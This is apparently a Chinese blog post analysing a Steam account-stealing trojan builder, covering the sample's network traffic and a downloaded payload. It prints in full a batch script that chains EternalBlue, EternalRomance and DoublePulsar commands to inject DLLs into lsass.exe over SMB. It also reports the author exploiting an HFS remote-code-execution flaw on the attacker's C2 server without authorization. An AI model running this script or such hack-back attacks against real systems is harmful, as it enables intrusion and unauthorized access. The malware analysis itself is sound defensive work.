前言
偶然看到一个steam盗号的视频,里面通过软件生成木马,打开之后如果输入了steam的账号密码,账号密码就会被盗取,如果那个电脑还登录了qq,甚至还可以通过登录qq邮箱来重置steam的密码(没有手机令牌,登录的qq邮箱为绑定steam的邮箱)。
在不可描述的交易之后,我拿到的样本
解压,丢到了虚拟机
分析
首先看了一下目录,里面好多fne格式结尾的文件,在文件夹的最后一行看到了客户端
这又大又闪的图标,难道是传说中的更换图标免杀么,我赶紧下载了图中的杀软,测试了一下
首先是断网测试的,打开软件试一试
哦吼,竟然还敢直接放qq出来
打开网站
这难道就是真正的黑客吗
虚拟机联网,再次打开软件
通过wireshark
看一下流量
首先返回了我的登录ip,之后返回了版本信息,最后返回了通知
注册一个账户登录一下
登录之后在不断的请求服务器,判断是否获取到新的账号密码
生成一个木马
直接就在虚拟机打开
在看流量的时候发现了一个rj.txt
HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 15 Jun 2020 20:10:00 GMT
Accept-Ranges: bytes
ETag: "6e3317f35043d61:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 28 Jun 2020 09:11:18 GMT
Content-Length: 120
http://note.youdao.com/yws/public/resource/ad9c19d74a1ee52aac35d1b1bab19b99/xmlnote/A33ECF11E57E4599B93D54D74F14C11B/335
之后的流量应该是下载了一个文件
等待文件下载完之后,看到了一串异常的流量
在遍历这个c段,感觉事情有点不妙,回头一看虚拟机已经蓝屏重启了...
把样本丢到微步
果然,在扫内网的永恒之蓝
可能因为虚拟机分配的内存比较小,所以一打就蓝屏了
接下来找到下载的文件
发现了攻击脚本
把虚拟机的内存调整为6g,之后更改脚本配置,直接打虚拟机
@echo off
mode con cols=100 lines=50&color 0c
set a=127.0.0.1
Eternalblue-2.2.0.exe --TargetIp %a% --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll --DllPayload dll\64.dll
Eternalblue-2.2.0.exe --TargetIp %a% --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll --DllPayload dll\86.dll
Eternalblue-2.2.0.exe --TargetIp %a% --Target WIN72K8R2 --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x86 --Function Rundll --DllPayload Eternalblue.dll
Eternalblue-2.2.0.exe --TargetIp %a% --Target XP --DaveProxyPort=0 --NetworkTimeout 60 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12
Doublepulsar-1.3.1.exe --TargetIp %a% --TargetPort 445 --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll --DllPayload Doublepulsar.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target WIN72K8R2 --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload dll\64.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target XP --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload dll\86.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target WIN72K8R2 --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x86 --Function RunDLL --DllPayload Eternalblue.dll
Eternalromance-1.4.0.exe --TargetIp %a% --Target XP --logfile log.txt
Doublepulsar-1.3.1.exe --TargetIp %a% --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload Doublepulsar.dll
echo %a%>>goodlog.txt
exit
发现请求了另一台主机,并且下载了文件
打开网站
已经有了2400多次的下载
看一下本地建立的链接
这个8000端口对应的ip应该就是对方的c2了
下载的文件继续放到微步分析
在shodan查看一下端口信息
在他的hfs服务上存在命令执行漏洞(hfs2.3c及以前的2.3x版本存在rce)
设置好参数,攻击成功后,获得截图
现在对方已经修复漏洞
尾声
拿下对方服务器没多久,攻击行为被对方发现,并且修补了漏洞,在日常下载软件的时候一定要在正规途径下载,使用杀软(多少有些作用)保护自己电脑的安全。